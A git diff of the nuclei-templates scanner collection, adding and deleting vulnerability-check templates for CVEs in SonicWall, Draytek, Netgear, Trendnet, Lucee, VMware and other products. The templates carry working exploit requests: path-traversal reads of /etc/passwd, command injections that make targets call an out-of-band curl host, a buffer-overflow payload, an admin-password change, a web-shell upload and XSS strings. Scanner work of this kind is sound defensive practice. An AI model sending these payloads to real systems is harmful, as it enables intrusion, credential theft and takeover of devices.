cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli - -http: - - method: GET - path: - - "{{BaseURL}}/css/eonweb.css" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version, '< 5.4', '>= 5.1') - - - type: word - part: body - words: - - "EyesOfNetwork" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version - group: 1 - regex: - - "# VERSION : ([0-9.]+)" - internal: true - part: body -# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8772.yaml b/nuclei-templates/CVE-2020/cve-2020-8772.yaml index beccc40018..0036ff439d 100644 --- a/nuclei-templates/CVE-2020/cve-2020-8772.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-8772.yaml @@ -1,83 +1,19 @@ id: CVE-2020-8772 info: - name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass - author: princechaddha,scent2d + name: InfiniteWP Improper Authentication + author: medbsq severity: critical - description: | - WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can gain unauthorized administrative access to the WordPress site. - remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. - reference: - - https://wpscan.com/vulnerability/10011 - - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - - https://wpvulndb.com/vulnerabilities/10011 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8772 - - https://github.com/ChoiSG/vwp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8772 - cwe-id: CWE-862 - epss-score: 0.96607 - epss-percentile: 0.99546 - cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* - metadata: - verified: true - max-request: 2 - vendor: revmakx - product: infinitewp_client - framework: wordpress - tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx -http: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} - - host-redirects: true - - matchers-condition: and +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: "_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==" matchers: - type: word - part: header words: - - "wordpress_logged_in" - - - type: word - part: body - words: - - "" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: username - group: 1 - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?ProjectDiscoverydwisiswant0 - - matchers-condition: and - matchers: - - type: word - words: - - "faultString" - - "No such service [ProjectDiscovery]" - - "methodResponse" - condition: and - part: body - - type: word - words: - - "Content-Type: text/xml" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-20200924a.yaml b/nuclei-templates/CVE-2020/cve-20200924a.yaml deleted file mode 100644 index 2f0b34a3f6..0000000000 --- a/nuclei-templates/CVE-2020/cve-20200924a.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-20200924a - -info: - name: Web requests can navigate outside of DRP controlled areas - Directory traversal - author: c-sh0 - severity: critical - description: Web requests can navigate outside of DRP controlled areas - Directory traversal - reference: - - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html - - https://docs.rackn.io/en/latest/doc/release.html - - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags - - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-20200924a - cwe-id: CWE-22 - tags: cve,cve2020,lfi,rackn,digitalrebar - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'X-Drp-Sha256sum:' - - - type: regex - regex: - - "root:.*:0:0" - diff --git a/nuclei-templates/CVE-2021/CVE-2021-20031.yaml b/nuclei-templates/CVE-2021/CVE-2021-20031.yaml deleted file mode 100644 index 06b2a5b689..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20031.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-20031 - -info: - name: SonicWall SonicOS 7.0 - Open Redirect - author: gy741 - severity: medium - description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site. - reference: - - https://www.exploit-db.com/exploits/50414 - - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 - - http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-20031 - cwe-id: CWE-601 - epss-score: 0.0135 - metadata: - max-request: 1 - google-query: inurl:"auth.html" intitle:"SonicWall" - tags: sonicwall,redirect,edb,packetstorm,cve,cve2021 - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{randstr}}.tld - - matchers-condition: and - matchers: - - type: word - words: - - 'https://{{randstr}}.tld/auth.html' - - 'Please be patient as you are being re-directed' - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/14 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20038.yaml b/nuclei-templates/CVE-2021/CVE-2021-20038.yaml new file mode 100644 index 0000000000..38e1264705 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-20038.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-20038 + +info: + name: SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution + author: dwisiswant0, jbaines-r7 + severity: critical + description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + reference: + - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20038 + - https://github.com/jbaines-r7/badblood + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20038 + cwe-id: CWE-787 + epss-score: 0.95323 + tags: cve,cve2021,overflow,rce,sonicwall,kev + metadata: + max-request: 2 + +variables: + useragent: '{{rand_base(6)}}' + +http: + - raw: + - | + GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1 + Host: {{Hostname}} + + attack: clusterbomb + payloads: + prefix_addr: + - "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address + system_addr: + - "%08%b7%06%08" # for 10.2.1.2-24sv + - "%64%b8%06%08" # for 10.2.1.1-1[79]sv + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + +# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20091.yaml b/nuclei-templates/CVE-2021/CVE-2021-20091.yaml deleted file mode 100644 index 6020c8d52b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20091.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2021-20091 - -info: - name: Buffalo WSR-2533DHPL2 - Configuration File Injection - author: gy741,pdteam,parth - severity: high - description: | - The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution. - reference: - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2021-20091 - tags: cve,cve2021,buffalo,firmware,iot - -requests: - - raw: - - | - GET /images/..%2finfo.html HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/info.html - - - | - POST /images/..%2fapply_abstract.cgi HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/info.html - Content-Type: application/x-www-form-urlencoded - - action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/Success.htm" - - - type: status - status: - - 302 - - extractors: - - type: regex - name: httoken - internal: true - group: 1 - regex: - - 'base64\,(.*?)" border=' - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20123.yaml b/nuclei-templates/CVE-2021/CVE-2021-20123.yaml deleted file mode 100644 index f9e9b8b2ca..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20123.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-20123 - -info: - name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet - author: 0x_Akoko - severity: high - description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. - reference: - - https://www.tenable.com/security/research/tra-2021-42 - - https://www.cvedetails.com/cve/CVE-2021-20123/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-20123 - cwe-id: CWE-22 - tags: cve,cve2021,draytek,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything" - - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20124.yaml b/nuclei-templates/CVE-2021/CVE-2021-20124.yaml new file mode 100644 index 0000000000..83e0c0386a --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-20124.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-20124 + +info: + name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + reference: + - https://www.tenable.com/security/research/tra-2021-42 + - https://www.cvedetails.com/cve/CVE-2021-20124 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-20124 + cwe-id: CWE-22 + tags: cve,cve2021,draytek,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd" + - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20158.yaml b/nuclei-templates/CVE-2021/CVE-2021-20158.yaml deleted file mode 100644 index 2632506f0e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20158.yaml +++ /dev/null @@ -1,63 +0,0 @@ -id: CVE-2021-20158 - -info: - name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change - author: gy741 - severity: critical - description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. - remediation: | - Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. - reference: - - https://www.tenable.com/security/research/tra-2021-54 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-20158 - cwe-id: CWE-306 - epss-score: 0.01211 - epss-percentile: 0.83684 - cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: trendnet - product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" - tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet -variables: - password: "{{rand_base(6)}}" - -http: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - - ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}} - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - - html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'setConnectDevice' - - 'setInternet' - - 'setWlanSSID' - - 'TEW-827DRU' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100e15be90cc09aaee56da2b77c6275476abc1df590621971793c44acc377119b650221009fda9d977e8181205a88397c477647b5d3e8936dad723f338b0dc445eedded28:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20167.yaml b/nuclei-templates/CVE-2021/CVE-2021-20167.yaml new file mode 100644 index 0000000000..57705f3636 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-20167.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-20167 + +info: + name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun + author: gy741 + severity: high + description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.' + reference: + - https://www.tenable.com/security/research/tra-2021-55 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20166 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20167 + remediation: Upgrade to newer release of the RAX43 firmware. + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8 + cve-id: CVE-2021-20167 + cwe-id: CWE-77 + epss-score: 0.95998 + tags: tenable,cve,cve2021,netgear,rce,router + metadata: + max-request: 1 + +http: + - raw: + - | + POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 + Host: {{Hostname}} + + "name":"';$(curl {{interactsh-url}});'", + "email":"a@b.c" + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21234.yaml b/nuclei-templates/CVE-2021/CVE-2021-21234.yaml deleted file mode 100644 index 11d9096dec..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21234.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-21234 - -info: - name: Spring Boot Actuator Logview Directory Traversal - author: gy741,pikpikcu - severity: high - description: | - spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview". - reference: - - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 - - https://github.com/cristianeph/vulnerability-actuator-log-viewer - - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 - - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N - cvss-score: 7.7 - cve-id: CVE-2021-21234 - cwe-id: CWE-22 - tags: cve,cve2021,springboot,lfi,actuator - -requests: - - method: GET - path: - - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows - - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows - - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux - - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21307.yaml b/nuclei-templates/CVE-2021/CVE-2021-21307.yaml deleted file mode 100644 index 209c9396d3..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21307.yaml +++ /dev/null @@ -1,88 +0,0 @@ -id: CVE-2021-21307 - -info: - name: Lucee Admin - Remote Code Execution - author: dhiyaneshDk - severity: critical - description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. - reference: - - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 - remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-21307 - cwe-id: CWE-862 - tags: cve,cve2021,rce,lucee,adobe - -requests: - - raw: - - | - POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - imgSrc=a - - | - POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - imgSrc= - - - - - - - -
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" - value="5">
- - - - - - - -
-        #HTMLCodeFormat(myVar)#
-        
-
- - - - | - POST /lucee/{{randstr}}.cfm HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - - cmd=id&opts=&timeout=5 - - matchers-condition: and - matchers: - - type: word - words: - - "uid=" - - "gid=" - - "groups=" - part: body - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - regex: - - "(u|g)id=.*" - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21479.yaml b/nuclei-templates/CVE-2021/CVE-2021-21479.yaml deleted file mode 100644 index e0c891203d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21479.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-21479 - -info: - name: SCIMono <0.0.19 - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and - execute java expressions and compromise the availability and integrity of the system. - reference: - - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 - - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2021-21479 - cwe-id: CWE-74 - tags: cve,cve2021,scimono,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" - - matchers: - - type: word - words: - - "The attribute value" - - "java.lang.UNIXProcess@" - - "has invalid value!" - - '"status" : "400"' - part: body - condition: and - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml deleted file mode 100644 index 44d996dca0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-21799 -info: - name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21799 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,xss,r-seenet -requests: - - method: GET - path: - - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Telnet " - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21801.yaml b/nuclei-templates/CVE-2021/CVE-2021-21801.yaml deleted file mode 100644 index 338eccbd88..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21801.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-21801 - -info: - name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) - author: gy741 - severity: medium - description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. - reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - tags: cve,cve2021,r-seenet,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' - - matchers-condition: and - matchers: - - type: word - words: - - '"zlo onerror=alert(1) "' - - 'Device Status Graph' - part: body - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml deleted file mode 100644 index a3eeb5f61e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-21802 - -info: - name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) - author: gy741 - severity: medium - description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. - reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - tags: cve,cve2021,r-seenet,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' - - matchers-condition: and - matchers: - - type: word - words: - - '"zlo onerror=alert(1) "' - - 'Device Status Graph' - part: body - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml b/nuclei-templates/CVE-2021/CVE-2021-21816.yaml new file mode 100644 index 0000000000..976e4d98e1 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21816.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-21816 + +info: + name: D-Link DIR-3040 1.13B03 - Information Disclosure + author: gy741 + severity: medium + description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21816 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2021-21816 + cwe-id: CWE-922 + epss-score: 0.00237 + tags: cve,cve2021,dlink,exposure,router,syslog + metadata: + max-request: 1 + +http: + - method: GET + path: + - "{{BaseURL}}/messages" + + matchers-condition: and + matchers: + - type: word + words: + - "syslog:" + - "admin" + - "/etc_ro/lighttpd/www" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by md on 2023/02/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22005.yaml b/nuclei-templates/CVE-2021/CVE-2021-22005.yaml deleted file mode 100644 index 2cca00890e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-22005.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-22005 - -info: - name: VMware vCenter Server - Arbitrary File Upload - author: PR3R00T - severity: critical - description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. - reference: - - https://kb.vmware.com/s/article/85717 - - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq - - https://nvd.nist.gov/vuln/detail/CVE-2021-22005 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-22005 - cwe-id: CWE-434 - epss-score: 0.97434 - tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive - metadata: - max-request: 2 - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - test_data - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - "status_code_2 == 201" - - "contains(body_1, 'VMware vSphere')" - - "content_length_2 == 0" - condition: and - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22053.yaml b/nuclei-templates/CVE-2021/CVE-2021-22053.yaml new file mode 100644 index 0000000000..b23745dd0e --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-22053.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-22053 + +info: + name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution + author: forgedhallpass + severity: high + description: | + Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a 